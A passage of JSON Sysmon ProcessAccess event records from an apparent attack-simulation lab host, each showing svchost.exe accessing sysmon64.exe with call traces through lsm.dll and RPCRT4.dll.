C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.368","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.368\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.368","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.368\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.368","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.368\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.368","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.368\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.368","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.368\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.368","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 